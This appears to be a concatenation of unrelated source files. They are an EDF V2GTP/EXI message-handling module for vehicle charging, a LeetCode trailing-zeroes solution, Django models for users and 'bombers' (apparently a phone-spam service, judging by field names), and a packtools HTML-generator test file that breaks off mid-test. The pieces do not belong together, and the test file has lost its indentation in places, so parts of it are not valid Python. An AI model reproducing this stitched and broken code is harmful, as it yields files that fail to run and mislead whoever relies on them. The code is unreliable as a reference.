zhhI = hhI / hh1 if hh1 > 0 else -9
# write to dataframe
rl1 = ['staFin!', t]
rl2 = [ind , pop, cur, ret , ever]
rl3 = [land, cul, aba, ccf , zcul, zaba, zccf]
rl4 = [hhs , hh1, hh0, zhh1, zhh0]
rl5 = [ hhL, hhI, zhhL, zhhI]
rl = rl1 + rl2 + rl3 + rl4 + rl5
# return to write dataframe of df_sta_fin
return rl
|
"""
.. module:: message_handling
:platform: Unix
:synopsis: A module that processes V2GTP messages.
.. Copyright 2022 EDF
.. moduleauthor:: Oscar RODRIGUEZ INFANTE, Tony ZHOU, Trang PHAM, Efflam OLLIVIER
.. License:: This source code is licensed under the MIT License.
"""
from xsdata.formats.dataclass.context import XmlContext
from xsdata.formats.dataclass.parsers import XmlParser
from xsdata.formats.dataclass.serializers import XmlSerializer
from xsdata.formats.dataclass.serializers.config import SerializerConfig
from shared.messages import V2GTPMessage
from shared.global_values import PROTOCOL_VERSION
from shared.log import logger
import lxml
from shared.global_values import SDP_PAYLOAD_TYPES, MAX_PAYLOAD_LENGTH, APP_PROTOCOL_EXIG, COMMON_MESSAGES_EXIG, \
DC_MESSAGES_EXIG, APP_PROTOCOL_XSD, COMMON_MESSAGES_XSD, DC_MESSAGES_XSD
import jpype
import os
import jpype.imports
from jpype.types import *
# The code below allows usage of Java classes by starting a JVM inside Python. This way, we can access variables
# initialized in the VM and use functions written in Java.
# The class path is assembled from every file under ../shared/lib, a path
# relative to the current working directory -- the process must therefore be
# launched from the expected package directory for the jars to resolve.
classpath = f'{str.join(":", ["../shared/lib/" + name for name in os.listdir("../shared/lib/")])}'
# '-ea' enables Java assertions; the JVM is started once, at import time.
jpype.startJVM(jpype.getDefaultJVMPath(), '-ea', "-Djava.class.path=%s" % classpath)
from java.io import FileInputStream, InputStream, ByteArrayInputStream, ByteArrayOutputStream, StringWriter, FileWriter
from java.lang import String
from org.openexi.scomp import EXISchemaReader
from org.openexi.schema import EXISchema
from org.openexi.sax import Transmogrifier, EXIReader
from org.openexi.proc.grammars import GrammarCache
from org.openexi.proc.common import AlignmentType, GrammarOptions
from org.xml.sax import InputSource
from java.nio.charset import Charset
from javax.xml.transform.sax import SAXTransformerFactory
from javax.xml.transform.stream import StreamResult
from javax.xml.parsers import SAXParserFactory
class Singleton(type):
    """Metaclass implementing the singleton pattern.

    The first instantiation of a class using this metaclass is cached;
    every later call returns that same cached instance (later constructor
    arguments are ignored).
    """
    _instances = {}
    def __call__(cls, *args, **kwargs):
        try:
            # fast path: an instance already exists for this class
            return cls._instances[cls]
        except KeyError:
            instance = super(Singleton, cls).__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
def open_exi_schema(filepath: str) -> EXISchema:
    """Loads EXISchema. Relies on Java classes.

    :param filepath: The path to the EXIG file.
    :return: EXISchema -- the object containing the schema.
    """
    reader_obj = EXISchemaReader()
    parsed_schema = None
    stream = None
    try:
        stream = FileInputStream(filepath)
        parsed_schema = reader_obj.parse(stream)
    finally:
        # always release the Java file handle, even if parsing fails
        if stream:
            stream.close()
    return parsed_schema
class MessageHandler(metaclass=Singleton):
    """This is the class that will process every single V2GTP message.

    EXI (de)serialization is delegated to the OpenEXI Java library through
    JPype. The encoder (Transmogrifier) and decoder (EXIReader) below are
    created once at class-definition time and shared by every call; the
    class itself is a Singleton. NOTE(review): the shared Java objects are
    presumably not safe for concurrent use -- confirm intended usage.
    """
    # EXI encoder (XML -> EXI), bit-packed alignment.
    transmogrifier = Transmogrifier()
    transmogrifier.setAlignmentType(AlignmentType.bitPacked)
    options = GrammarOptions.DEFAULT_OPTIONS
    transmogrifier.setBlockSize(1000000)
    transmogrifier.setValueMaxLength(-1)
    transmogrifier.setValuePartitionCapacity(0)
    sax_transformer_factory = JObject(SAXTransformerFactory.newInstance(), SAXTransformerFactory)
    sax_parser_factory = SAXParserFactory.newInstance()
    sax_parser_factory.setNamespaceAware(True)
    transformer_handler = sax_transformer_factory.newTransformerHandler()
    # EXI decoder (EXI -> XML); its settings mirror the encoder's.
    reader = EXIReader()
    reader.setAlignmentType(AlignmentType.bitPacked)
    reader.setBlockSize(1000000)
    reader.setValueMaxLength(-1)
    reader.setValuePartitionCapacity(0)
    reader.setContentHandler(transformer_handler)
    # One parsed schema + grammar cache per message family (SAP / Common / DC).
    ap_schema = open_exi_schema(APP_PROTOCOL_EXIG)
    ap_grammar_cache = GrammarCache(ap_schema, options)
    common_schema = open_exi_schema(COMMON_MESSAGES_EXIG)
    common_grammar_cache = GrammarCache(common_schema, options)
    dc_schema = open_exi_schema(DC_MESSAGES_EXIG)
    dc_grammar_cache = GrammarCache(dc_schema, options)

    def __init__(self):
        # XSD validators backing is_xml_valid, one per message family.
        self.xml_SAP_validator = lxml.etree.XMLSchema(file=APP_PROTOCOL_XSD)
        self.xml_Common_validator = lxml.etree.XMLSchema(file=COMMON_MESSAGES_XSD)
        self.xml_DC_validator = lxml.etree.XMLSchema(file=DC_MESSAGES_XSD)

    def is_valid(self, v2gtp_message: V2GTPMessage) -> bool:
        """Return True when the V2GTP header passes version, payload-type
        and payload-length checks.

        Fix: the original evaluated is_version_valid twice; the redundant
        duplicate call has been removed.
        """
        if self.is_version_valid(v2gtp_message) and self.is_payload_type_correct(v2gtp_message) \
                and self.is_payload_length_correct(v2gtp_message):
            logger.info("Message is valid.")
            return True
        logger.warn("Message is not valid.")
        return False

    @staticmethod
    def is_version_valid(v2gtp_message: V2GTPMessage) -> bool:
        """Check the protocol version byte and its bitwise inverse byte."""
        protocol_version = v2gtp_message.get_protocol_version()
        if protocol_version != PROTOCOL_VERSION:
            logger.error("Protocol version mismatch.")
            return False
        # the inverse version byte must be the one's complement of the version
        if v2gtp_message.get_inverse_protocol_version() != protocol_version ^ 0xff:
            logger.error("Inverse protocol version mismatch.")
            return False
        return True

    @staticmethod
    def is_payload_type_correct(v2gtp_message: V2GTPMessage) -> bool:
        """Check the payload type against the known SDP payload types."""
        payload_type = v2gtp_message.get_payload_type()
        # direct membership test replaces the original manual key loop
        if payload_type in SDP_PAYLOAD_TYPES:
            return True
        logger.error("Unrecognized payload type.")
        return False

    @staticmethod
    def is_payload_length_correct(v2gtp_message: V2GTPMessage) -> bool:
        """Check that the payload length is positive and below the maximum."""
        payload_length = v2gtp_message.get_payload_length()
        if 0 < payload_length < MAX_PAYLOAD_LENGTH:
            return True
        logger.error("Wrong payload size.")
        return False

    @staticmethod
    def encode(xml_contents: str, type_msg: str) -> bytes:
        """Turns a human-readable XML string into an EXI-encoded byte array.
        Relies on Java classes.

        :param xml_contents: The XML string to be encoded.
        :param type_msg: The type of message used ("SAP", "Common" or "DC").
        :return: bytes -- the encoded result (Java byte[]); the annotation
            was corrected from str, which the original never returned.
        :raises Exception: if type_msg is not a known message type.
        """
        contents = String(xml_contents)
        input = None
        output = None
        try:
            t = MessageHandler.transmogrifier
            input = ByteArrayInputStream(contents.getBytes(Charset.forName("ASCII")))
            output = ByteArrayOutputStream()
            # select the grammar cache matching the message family
            if type_msg == "SAP":
                t.setGrammarCache(MessageHandler.ap_grammar_cache)
            elif type_msg == "Common":
                t.setGrammarCache(MessageHandler.common_grammar_cache)
            elif type_msg == "DC":
                t.setGrammarCache(MessageHandler.dc_grammar_cache)
            else:
                raise Exception("Unknown message type")
            t.setOutputStream(output)
            t.encode(InputSource(input))
            result = output.toByteArray()
        finally:
            # always release the Java streams
            if input:
                input.close()
            if output:
                output.close()
        return result

    @staticmethod
    def decode(exi_contents: bytes, type_msg: str) -> str:
        """Turns EXI-encoded bytes into a human-readable XML string.
        Relies on Java classes.

        :param exi_contents: The EXI encoded contents.
        :param type_msg: The type of message used ("SAP", "Common" or "DC").
        :return: str -- the decoded string.
        :raises Exception: if type_msg is not a known message type.
        """
        # (the original also tracked a never-assigned output stream; removed)
        input = None
        stringWriter = StringWriter()
        result = None
        try:
            input = ByteArrayInputStream(exi_contents)
            r = MessageHandler.reader
            tf_handler = MessageHandler.transformer_handler
            # select the grammar cache matching the message family
            if type_msg == "SAP":
                r.setGrammarCache(MessageHandler.ap_grammar_cache)
            elif type_msg == "Common":
                r.setGrammarCache(MessageHandler.common_grammar_cache)
            elif type_msg == "DC":
                r.setGrammarCache(MessageHandler.dc_grammar_cache)
            else:
                raise Exception("Unknown message type")
            tf_handler.setResult(StreamResult(stringWriter))
            r.parse(InputSource(input))
            result = stringWriter.getBuffer().toString()
        finally:
            # always release the Java input stream
            if input:
                input.close()
        return str(result)

    def supported_app_to_exi(self, xml_contents) -> bytes:
        """Validate and EXI-encode a Supported App Protocol message."""
        logger.info("Supported App Protocol message to be encoded")
        if self.is_xml_valid(xml_contents, 'SAP'):
            logger.info("Message is valid against Schema XSD")
            return self.encode(xml_contents, "SAP")
        else:
            raise Exception("XML is not valid against schema")

    def v2g_common_msg_to_exi(self, xml_contents) -> bytes:
        """Validate and EXI-encode a Common message."""
        logger.info("Common message to be encoded")
        if self.is_xml_valid(xml_contents, 'Common'):
            logger.info("Message is valid against Schema XSD")
            return self.encode(xml_contents, "Common")
        else:
            raise Exception("XML is not valid against schema")

    def v2g_dc_msg_to_exi(self, xml_contents) -> bytes:
        """Validate and EXI-encode a DC message."""
        logger.info("DC message to be encoded")
        if self.is_xml_valid(xml_contents, 'DC'):
            logger.info("Message is valid against Schema XSD")
            return self.encode(xml_contents, "DC")
        else:
            raise Exception("XML is not valid against schema")

    def exi_to_supported_app(self, exi_contents) -> str:
        """EXI-decode a Supported App Protocol message."""
        logger.info("Supported App Protocol message to be decoded")
        return self.decode(exi_contents, "SAP")

    def exi_to_v2g_common_msg(self, exi_contents) -> str:
        """EXI-decode a Common message."""
        logger.info("Common message to be decoded")
        return self.decode(exi_contents, "Common")

    def exi_to_v2g_dc_msg(self, exi_contents) -> str:
        """EXI-decode a DC message."""
        logger.info("DC message to be decoded")
        return self.decode(exi_contents, "DC")

    @staticmethod
    def unmarshall(xml):
        """Extracts data from XML string and turns it to an object understood by the machine.

        :param xml: The XML string to extract data from.
        :return: object -- the resulting XML object.
        """
        parser = XmlParser(context=XmlContext())
        xml_object = parser.from_string(xml)
        return xml_object

    @staticmethod
    def marshall(message) -> str:
        """Turns an XML object to a string.

        :param message: The XML object to be processed.
        :return: str -- the resulting XML string.
        """
        config = SerializerConfig(pretty_print=True)
        serializer = XmlSerializer(config=config)
        xml_string = serializer.render(message)
        return xml_string

    def is_xml_valid(self, xml, msg_type):
        """This method allows to check if an XML message is valid using the corresponding XSD.

        :param xml: Input XML string.
        :param msg_type: message type based on schema ("SAP", "Common" or "DC").
        :return: boolean statement - true: valid, false: invalid
        :raises ValueError: if msg_type is not a known message type.
        """
        is_valid = False
        xml_file = lxml.etree.XML(xml.encode("ascii"))
        if msg_type == 'SAP':
            validator = self.xml_SAP_validator
        elif msg_type == 'Common':
            validator = self.xml_Common_validator
        elif msg_type == 'DC':
            validator = self.xml_DC_validator
        else:
            # Fix: an unknown msg_type previously crashed later with
            # UnboundLocalError; fail fast with an explicit error instead.
            raise ValueError("Unknown message type: %s" % msg_type)
        try:
            validator.assertValid(xml_file)
            is_valid = True
        except lxml.etree.DocumentInvalid as e:
            logger.warn(e)
            logger.warn(xml)
        finally:
            # NOTE: returning from finally deliberately swallows any other
            # exception raised during validation (original behavior kept).
            return is_valid
|
# https://leetcode.com/problems/factorial-trailing-zeroes/
#
# algorithms
# Easy (37.09%)
# Total Accepted: 140,770
# Total Submissions: 379,570
class Solution(object):
    def trailingZeroes(self, n):
        """Count trailing zeroes of n! by counting factors of 5.

        :type n: int
        :rtype: int

        Each trailing zero comes from a 2x5 factor pair and 5s are the
        scarcer factor, so the answer is n//5 + n//25 + n//125 + ...
        Runs in O(log_5 n).
        """
        res = 0
        while n > 0:
            # Fix: the original used `n /= 5`, which is float true
            # division in Python 3 and yields wrong (non-integer) results;
            # floor division keeps n an int.
            n //= 5
            res += n
        return res
|
from django.contrib.auth.models import User
from django.db import models
class UserData(models.Model):
    """Application user record, optionally linked one-to-one to Django's auth User.

    NOTE(review): `id` is a caller-supplied integer primary key — presumably an
    external account id from an upstream service; confirm against the writers.
    """
    # Optional link to the built-in auth user; CASCADE deletes this row
    # when the linked auth user is deleted.
    auth_user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
    # Externally supplied primary key (no auto-increment).
    id = models.IntegerField(primary_key=True)
    # Account balance; defaults to 0.0 and may not be NULL.
    balance = models.FloatField(default=0.0, null=False)
    # Preferred language identifier; nullable when unknown.
    language = models.CharField(max_length=16, null=True)
    # Cached display/user name; nullable when unknown.
    username = models.CharField(max_length=150, null=True)
    # Tri-state flags: True / False / unknown (NULL).
    is_bomber = models.BooleanField(null=True)
    is_blocked = models.BooleanField(null=True)
    class Meta:
        verbose_name = "UserData"
        verbose_name_plural = "UsersData"
class BomberData(models.Model):
    """Record describing a bomber account and its activity metadata.

    Fix: removed a stray trailing `|` after the last line, which made the
    module a syntax error (extraction residue).
    """
    # Externally supplied primary key (no auto-increment).
    id = models.IntegerField(primary_key=True)
    username = models.CharField(max_length=150)
    # Stored as a plain string; presumably a serialized collection of
    # circle identifiers -- TODO confirm the expected format.
    circles = models.CharField(max_length=255)
    # Most recently used phone number, if any.
    last_phone = models.CharField(max_length=128, null=True)
    # Timestamp of the most recent launch, if any.
    last_launch = models.DateTimeField(null=True)
    # Set automatically when the row is first created.
    created = models.DateTimeField(auto_now_add=True)
    class Meta:
        verbose_name = "BomberData"
        verbose_name_plural = "BombersData"
# coding: utf-8
from __future__ import unicode_literals
import unittest
import io
import os
from tempfile import NamedTemporaryFile
from lxml import etree
from packtools import domain
def setup_tmpfile(method):
def wrapper(self):
valid_tmpfile = NamedTemporaryFile()
valid_tmpfile.write(b'<a><b>bar</b></a>')
valid_tmpfile.seek(0)
self.valid_tmpfile = valid_tmpfile
method(self)
self.valid_tmpfile.close()
return wrapper
SAMPLES_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'samples')
class HTMLGeneratorTests(unittest.TestCase):
@setup_tmpfile
def test_initializes_with_filepath(self):
self.assertTrue(domain.HTMLGenerator.parse(self.valid_tmpfile.name, valid_only=False))
def test_initializes_with_etree(self):
fp = io.BytesIO(b'<a><b>bar</b></a>')
et = etree.parse(fp)
self.assertTrue(domain.HTMLGenerator.parse(et, valid_only=False))
def test_languages(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False).languages, ['pt', 'en', 'es'])
def test_language(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False).language, 'pt')
def test_language_missing_data(self):
""" This should not happen since the attribute is mandatory.
"""
sample = u"""<article>
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEquals(domain.HTMLGenerator.parse(
et, valid_only=False).language, None)
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_epub_ppub(self):
sample = u"""<article>
<front>
<journal-meta>
<journal-title-group>
<journal-title>Revista de Saude Publica</journal-title>
<abbrev-journal-title abbrev-type='publisher'>Rev. Saude Publica</abbrev-journal-title>
</journal-title-group>
</journal-meta>
<article-meta>
<pub-date pub-type="epub-ppub">
<day>17</day>
<month>03</month>
<year>2014</year>
</pub-date>
<volume>10</volume>
<issue>2</issue>
</article-meta>
</front>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
self.assertEqual(domain.HTMLGenerator.parse(et, valid_only=False)._get_bibliographic_legend(),
u'Rev. Saude Publica vol.10 no.2 Mar 17, 2014')
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_with_season(self):
pass
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_epub_epub_ppub(self):
pass
@unittest.skip('aguardando definicao')
def test_bibliographic_legend_ahead_of_print(self):
pass
def test_generation_unknown_language(self):
sample = u"""<article xml:lang="pt">
<sub-article xml:lang="en" article-type="translation" id="S01">
</sub-article>
<sub-article xml:lang="es" article-type="translation" id="S02">
</sub-article>
</article>
"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
gen = domain.HTMLGenerator.parse(et, valid_only=False)
self.assertRaises(ValueError, lambda: gen.generate('ru'))
def test_no_abstract_title_if_there_is_a_title_for_abstract(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<title>Abstract</title>
<p>Abstract Content</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstract")
def test_abstract_title_if_no_title_for_abstract(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<p>Abstract Content</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstract")
def test_no_abstract_title_if_there_are_titles_for_abstracts(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<title>Abstract</title>
<p>Abstract Content</p>
</abstract>
<trans-abstract xml:lang="es">
<title>Resumen</title>
<p>Contenido del Resumen</p>
</trans-abstract>
</article-meta>
</front>
<sub-article article-type="translation" xml:lang="pt">
<front-stub>
<abstract>
<title>Resumo</title>
<p>Conteúdo do Resumo</p>
</abstract>
</front-stub>
</sub-article>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 3)
self.assertEqual(
{title_tag.text for title_tag in title_tags},
set(["Abstract", "Resumen", "Resumo"])
)
def test_abstract_title_if_no_titles_for_abstracts(self):
sample = u"""<article
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:lang="en">
<front>
<article-meta>
<abstract>
<p>Abstract Content</p>
</abstract>
<trans-abstract xml:lang="es">
<p>Contenido del Resumen</p>
</trans-abstract>
</article-meta>
</front>
<sub-article article-type="translation" xml:lang="pt">
<front-stub>
<abstract>
<p>Conteúdo do Resumo</p>
</abstract>
</front-stub>
</sub-article>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
title_tags = html.findall('//h1[@class="articleSectionTitle"]')
self.assertEqual(len(title_tags), 1)
self.assertEqual(title_tags[0].text, "Abstracts")
def test_if_visual_abstract_image_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="en">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Visual Abstract</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Inglês</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('en')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<img style="max-width:100%" src="2175-8239-jbn-2018-0058-vf01.jpg">', html_string)
def test_if_visual_abstract_caption_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Resumo Visual</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Português</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('Caption em Português', html_string)
def test_if_visual_abstract_anchor_section_present_in_html(self):
sample = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
<front>
<article-meta>
<abstract abstract-type="graphical">
<title>Resumo Visual</title>
<p>
<fig id="vf01">
<caption>
<title>Caption em Português</title>
</caption>
<graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
</fig>
</p>
</abstract>
</article-meta>
</front>
</article>"""
fp = io.BytesIO(sample.encode('utf-8'))
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
html_string = etree.tostring(html, encoding='unicode', method='html')
self.assertIn('<div class="articleSection" data-anchor="Resumo Visual">', html_string)
def test_if_visual_abstract_section_present_in_html(self):
    """The visual-abstract section title must be present in the output."""
    xml = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
                  <front>
                    <article-meta>
                      <abstract abstract-type="graphical">
                        <title>Resumo Visual</title>
                        <p>
                          <fig id="vf01">
                            <caption>
                              <title>Caption em Português</title>
                            </caption>
                            <graphic xlink:href="2175-8239-jbn-2018-0058-vf01.jpg"/>
                          </fig>
                        </p>
                      </abstract>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn('Resumo Visual', rendered)
def test_if_visual_abstract_image_from_another_language_is_present_in_html(self):
    """Generating the translation language must pick the sub-article's own graphic."""
    xml = u"""<article xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:xlink="http://www.w3.org/1999/xlink" xml:lang="pt">
                <sub-article article-type="translation" id="s1" xml:lang="en">
                  <front-stub>
                      <abstract abstract-type="graphical">
                        <title>Visual Abstract EN</title>
                        <p>
                          <fig id="vf01">
                            <caption>
                              <title>Caption em Inglês</title>
                            </caption>
                            <graphic xlink:href="2175-8239-jbn-2018-0058-vf01-EN.jpg"/>
                          </fig>
                        </p>
                      </abstract>
                  </front-stub>
                </sub-article>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('en'), encoding='unicode', method='html')
    self.assertIn('<img style="max-width:100%" src="2175-8239-jbn-2018-0058-vf01-EN.jpg">', rendered)
def test_if_history_section_is_present_in_primary_language(self):
    """The English history box must list received/accepted/published dates."""
    xml_path = os.path.join(SAMPLES_PATH, '0034-7094-rba-69-03-0227.xml')
    generator = domain.HTMLGenerator.parse(etree.parse(xml_path), valid_only=False)
    rendered = etree.tostring(
        generator.generate('en'), encoding='unicode', method='html')
    for fragment in (
        '<h1 class="articleSectionTitle">History</h1>',
        '<strong>Received</strong><br>9 July 2018</li>',
        '<strong>Accepted</strong><br>14 Jan 2019</li>',
        '<strong>Published</strong><br>26 Apr 2019</li>',
    ):
        self.assertIn(fragment, rendered)
def test_if_history_section_is_present_in_sub_article(self):
    """The Portuguese translation must render a localized history box."""
    xml_path = os.path.join(SAMPLES_PATH, '0034-7094-rba-69-03-0227.xml')
    generator = domain.HTMLGenerator.parse(etree.parse(xml_path), valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    for fragment in (
        '<h1 class="articleSectionTitle">Histórico</h1>',
        '<strong>Recebido</strong><br>9 Jul 2018</li>',
        '<strong>Aceito</strong><br>14 Jan 2019</li>',
        '<strong>Publicado</strong><br>31 Maio 2019</li>',
    ):
        self.assertIn(fragment, rendered)
def test_show_retraction_box_if_article_is_an_retraction(self):
    """A retraction article must show the retraction box with a DOI link."""
    xml = u"""<article article-type="retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
                      xlink:href="10.1590/2236-8906-34/2018"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn(u'Esta retratação retrata o documento', rendered)
    self.assertIn(
        u'<ul><li><a href="https://doi.org/10.1590/2236-8906-34/2018" target="_blank">10.1590/2236-8906-34/2018</a></li>',
        rendered
    )
def test_should_translate_retraction_to_english(self):
    """For an en-language retraction the box copy must be in English."""
    xml = u"""<article article-type="retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="en"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
                      xlink:href="10.1590/2236-8906-34/2018"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('en'), encoding='unicode', method='html')
    self.assertIn(u'This retraction retracts the following document', rendered)
def test_do_not_show_retraction_box_if_article_is_not_a_retraction(self):
    """A plain research-article must not render the retraction box."""
    xml = u"""<article article-type="research-article" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="doi" id="r01" related-article-type="retracted-article"
                      xlink:href="10.1590/2236-8906-34/2018"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertNotIn(u'This retraction retracts the following document', rendered)
def test_show_retraction_box_if_article_is_an_partial_retraction(self):
    """A partial retraction must also render the retraction box with a DOI link."""
    xml = u"""<article article-type="partial-retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="doi" id="r01" related-article-type="partial-retraction"
                      xlink:href="10.1590/2236-8906-34/2018"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn(u'Esta retratação retrata o documento', rendered)
    self.assertIn(
        u'<ul><li><a href="https://doi.org/10.1590/2236-8906-34/2018" target="_blank">10.1590/2236-8906-34/2018</a></li>',
        rendered
    )
def test_presents_link_to_retreted_document_using_pid(self):
    """A scielo-pid related-article must become an /article/<pid> link."""
    xml = u"""<article article-type="partial-retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="scielo-pid" id="r01" related-article-type="partial-retraction"
                      xlink:href="S0864-34662016000200003"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn(u'Esta retratação retrata o documento', rendered)
    self.assertIn(
        u'<ul><li><a href="/article/S0864-34662016000200003" target="_blank">S0864-34662016000200003</a></li>',
        rendered
    )
def test_presents_link_to_retreted_document_using_aid(self):
    """A scielo-aid related-article must become an /article/<aid> link."""
    xml = u"""<article article-type="partial-retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
